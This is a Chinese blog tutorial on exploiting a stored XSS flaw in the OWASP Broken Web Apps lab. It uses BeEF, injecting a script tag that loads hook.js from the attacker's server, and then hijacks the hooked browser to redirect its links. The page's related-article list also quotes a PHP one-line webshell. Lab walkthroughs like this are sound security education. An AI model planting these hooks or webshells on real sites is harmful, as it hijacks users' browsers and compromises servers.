一个简单的Web劫持(XSS漏洞)

最新推荐文章于 2023-09-18 17:37:38 发布
最新推荐文章于 2023-09-18 17:37:38 发布
阅读量893 收藏 10
点赞数 7
分类专栏: 网安 文章标签: 网络 安全 xss http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42442326/article/details/104896521
版权

一个简单的Web劫持

本篇文章仅供参考学习,切勿用作非法用途

今天给大家带来我的另一个学习过程的分享,就是XSS漏洞的利用,还是原来的味道,先介绍一下这次XSS渗透的工具。

1:beef(用来植入勾子,且对网站进行控制)
在这里插入图片描述
2:OWASP_Broken_Web_Apps(靶子)
在这里插入图片描述
先给大家讲一下大概的思路吧,就是先启动Beef,将勾子ip(其实也就是Beef的ip)写成语句,然后将语句写入目标网站有XSS漏洞的地方,比如留言板。然后利用Beef对目标站点进行控制。

文章目录

一.启动Beef服务

首先在这里就不具体讲解Beef如何下载和设置了,大家可以自己去百度一下,这种东西毕竟还是需要自己来实践的嘛,算了还是给你们个链接吧,谁让我爱你们呢。

点我教你Beef的安装与简单使用
这里我用的是kali虚拟机,所以还是给大家贴一下命令图,首先单击虚拟机左侧任务栏的Beef按钮,如果没有这个图标的同学,可以尝试用命令开启一下 beef-xss,虽然Beef已经被做成了服务,但是还是不建议这么启动,还是建议大家从systemctl 命令来启动或关闭beef服务器

systemctl start beef-xss.service    #开启beef

systemctl stop beef-xss.service     #关闭beef

systemctl restart beef-xss.service  #重启beef

在这里插入图片描述
打开后这时会弹出一个网页,这个网页就是Beef,不要怀疑。结果一开我懵逼了。在这里插入图片描述
为什么没网,连接不上,捣鼓了一会我才想起来,我把默认的Beef 的IP 给改掉了,改成了虚拟机的ip,所以换一下IP就可以了。
在这里插入图片描述
果然进去了,这里提醒一下第一次用这个软件的小伙伴,这个平台默认的账号和密码 beef/beef。直接登上就好了。
在这里插入图片描述
这应该是初登上时候看到的页面,接下来我们去看一下运行Beef的控制台信息。细心的小伙伴肯定发现了,其实它已经帮我们写好了勾子文件,可以直接拿来用了,当然如果你把Beef的配置文件改了的话,就需要修改一下这个语句了,其实简单说就是把你的http://后面的IP改的和你登录Beef时,URL中一样的IP就好。
在这里插入图片描述
因为我改过配置文件,所以我的勾子语句是这样的:

<script src="http://192.168.187.131:3000/hook.js"></script>

大家如果没有修改过配置文件的话,勾子代码如下:

<script src="http://127.0.0.1:3000/hook.js"></script>

到这里Beef先到这里,接下来开始调整我们的靶场。

二.OWASP靶场

首先打开我们的靶场,然后找到里面的XSS漏洞的框,因为这个靶场里面标明了,所以直接点开就好了,然后把刚刚的代码写入,如图所示:
在这里插入图片描述
然后将代码提交上去,好了到这里靶场里面需要干的事情都结束了,然后返回Beef查看是否成功。

三.利用Beef劫持浏览器

返回Beef后我们发现在Beef的左侧出来一个IP。这就证明此时浏览器已经上钩了,我们就可以对它进行控制了。
在这里插入图片描述
然后单击这个IP地址,此时右边出来一些东西。然后按照下图进行。
在这里插入图片描述
然后打开Browser目录,再单击Hooked Domain目录,找见Reaplace HREFs
在这里插入图片描述
然后再右侧的框中输入想让页面跳转的网址,这里以 百度 为例,所以在右边输入了 www.baidu.com
在这里插入图片描述
然后点击Execute,然后返回我们的靶场网站,随便点击一个页面中的网站,就会发现没有跳转到目标站点,而是挑战到了百度的主页。
在这里插入图片描述
到此这次XSS漏洞的利用到此就完成了,至于Beef中的其它功能还需要大家自己去查阅学习。这里只对软件进行基础的讲解。顺便给大家说一下Beef目录中的不同颜色的圆点的意思:

绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常

橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常

灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行

红色:命令模块不适用于此目标

~
~
好了!这次XSS漏洞的利用到此就结束了,对其实XSS漏洞原名叫CSS(Cross Site Scripting),但是你知道为什么改名吗?哈哈哈哈,快去百度一下吧!
~
~
~

属实创作不易,希望看到此文的小伙伴可以给博主点个赞!! 谢谢大家!!*

在这里插入图片描述
~

再次强调本文仅供用来交流学习,切勿吴用,造成一切后果与本人无关

yxngu
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞解决方案实例
08-30
跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
OWASP Broken Web Apps渗透测试环境搭建和安装教程
热门推荐
lucashu的博客
04-14 1万+
本文目录概述导入Vmware登录靶机 概述 OWASP Broken Web App 项目生成一个虚拟机,能够运行各种已知漏洞的应用程序 官网下载地址: https://sourceforge.net/projects/owaspbwa/files 官网下载最新版本 导入Vmware 在Vmware中直接打开虚拟机 登录靶机 在启动以后输入用户名root 密码owaspbw...
网络安全OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程
小啊呜的博客
05-08 9771
网络安全OWASP Broken Web Apps渗透测试环境搭建&安装 详细教程 一、关于 OWASP 下载安装 二、导入VMware Worksation 三、登录和访问 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
XSS漏洞-01】XSS漏洞原理和危害及验证与分类
cc
02-10 7775
反射型XSS不与数据库进行交互,直接由前端进行反馈;存储型XSS会将恶意代码写进服务器的数据库中;反射型和存储型xss都先将数据发送到了服务器,再从服务器读取数据显示到页面中,burp能抓取到数据;DOM型XSS主要是在浏览器本地修改DOM树而执行,并不会经过服务器,所以burp抓取不到包。
OWASP文件上传漏洞总结(低,中)
weixin_51333478的博客
04-28 338
OWASP Broken Web Apps VM v1.2靶场的Damn Vulnerable Web Application中的文件上传漏洞 1.低安全级别(low) 可以上传任意类型的文件,存在上传,木马的分线,例如:一句话木马< ?php @eval($ _POST [ ‘pass’])?> ,其中pass为密码。 上传成功后显示如下状态 然后拼出整个url(去掉原地址栏的#) 最终URL为 使用菜刀新建该URL便可以进入靶机。(菜刀的连接可能与防火墙有关,我中间没有连接成功
靶机全家桶之OWASP Broken Web Application
Kevin's Blog
05-08 5182
文章目录一、介绍二、下载三、安装四、技巧 一、介绍   OWASP出具的一个集成在虚拟机中的靶机漏洞环境集合–BWA项目,免费、开源,里面包含: 自动化测试工具 测试源码分析工具 观察网络攻击 测试waf类技术 脆弱的web仿真环境 二、下载 最新版是15年的1.2版本:https://sourceforge.net/projects/owaspbwa/files/ 三、安装 》》解压下载的...
DVWA靶场+BEEFxss平台复现XSS脚本攻击(获取cookie,跳转指定网页)
最新发布
weixin_73180072的博客
09-18 401
1.kali搭建安装好beef2.win10搭建好dvwa靶场。
二、文件包含漏洞 低、中 、高三级别详解(一句话木马,图片木马)
Hala
04-18 4589
文件包含漏洞 项目实验环境 OWASP Broken Web Apps VM v1.2 靶场 burpsuite 代理服务器 Kali-Linux-2020.1-vmware-amd64 攻击机 中国菜刀 连接webshell edjpgcom 图片注入代码 原理与危害 文件包含漏洞:即File Inclusion ,意思是文件包含(漏洞)是,指当服务器开启allow. _url_inclu...
一、文件上传漏洞 低、中、高三级别 详解
Hala
04-16 1617
一、文件上传漏洞 项目实验环境 OWASP Broken Web Apps VM v1.2 靶场
网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
网络安全
03-27 8627
对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.ne...
调查:XSS攻击Web应用程序-研究论文
05-20
交叉脚本(XSS)是Web应用程序的重大风险,因为它是对Web应用程序的基本而简单的攻击。 Xss为攻击设置了平台,例如跨站点请求会话劫持,伪造...等。 XSS攻击是一种注入攻击,其中攻击者在客户端程序的用户端或...
Web应用安全XSS安全隐患产生原因.pptx
06-18
XSS安全隐患产生原因 1 XSS安全隐患 目录 2 XSS安全隐患产生原因 XSS安全隐患 1、网络钓鱼,包括盗取各类用户账号; 2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 3、劫持...
预防XSS攻击和SQL注入XssFilter
07-23
攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,黑客界共识是:跨站脚本攻击是...
MSF+内网穿透 实现远控
yxngu
05-09 9667
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6339
正入万山圈子里,一山放过一山拦。
用Cisco模拟器,还原一个真实的公司网络部署过程
yxngu
01-12 4506
给公司部署网络,肯定公司会有固定的要求,所以我们一切的部署和规划都要按着公司的意思来。首先看一下该公司提出的要求。 根据该公司的要求简单的先部署了一个网络结构,用来演示整个部署的过程。 一 看到第一条要求,全网互通,不要慌,按自己的想法一点一点来,首先我们先看来看看一下北京总部,需要实现什么功能。看到三层交换机了,那就先把北京的内网全通了吧,开淦。说一下思路,实现内网互通,就是vlan+trunk+vtp+网关+三层交换机的routing. 首先我们先将 三层交换机 和 二层交换机 的链路变成 trun
小白是这样给自己搭建服务器和网站的
yxngu
05-08 2822
摘要(扯犊子) 前段时间,帮朋友搭建了一下阿里云的服务器,其中遇见的坑是真的不少,会的话10分钟,不会的话好久好久,所以把搭建经验分享给大家,希望大家少走弯路,好了废话不多说了,直接开始吧!!! 先给大家看一下搭建成功的首页吧!! 这里看感觉会有点黑,但是在网站看,还是挺炫酷的,是会动的的网页,因为是朋友的服务器,所以这里就不给大家域名和IP了。 需要的工具 1.阿里云服务器和未解析的域名 2.XFTP(对服务器和物理机进行连接方便文件的传输) 3.Xshell (对服务器终端进行连接,方便指令操作,也可
一个简单Web渗透(文件上传漏洞
yxngu
03-14 2809
本篇文章仅供学习参考,切勿用作非法用途。 进入正题 本来想写的粗略一点,但是回想起来自己当初学习的时候,一个小问题都能纠结半天,所以本白决定从开天辟地开始写起,今天这个渗透是利用文件上传的漏洞,这里采用最广泛的头像上传图片的漏洞进行渗透。首先渗透肯定是需要工具的,所以您需要准备以下工具: 1:burp suit. (主要是使用Proxy模块抓包) 2:firefox浏览器(个人喜好,主要使用代理...
xss漏洞 pikachu
08-13
XSS漏洞是一种Web应用程序中常见的安全漏洞,它允许攻击者将恶意代码注入到受信任的网页中,从而实施各种攻击,例如窃取用户的敏感信息、会话劫持等。在文章中引用的内容提到了关于Pikachu靶场的XSS漏洞学习总结和详解。Pikachu靶场是一个针对XSS漏洞进行训练和测试的平台,它提供了不同级别和类型的XSS漏洞供用户学习和实践。文章中列举了许多关卡,涵盖了反射型XSS、存储型XSS、DOM型XSS等不同类型的XSS漏洞。此外,还提到了DOM-X型危害更大,因为它可以在URL中体现,将URL发给受害者就能进行攻击的特点。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Pikachu靶场之XSS漏洞详解](https://blog.csdn.net/m0_46467017/article/details/124747885)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值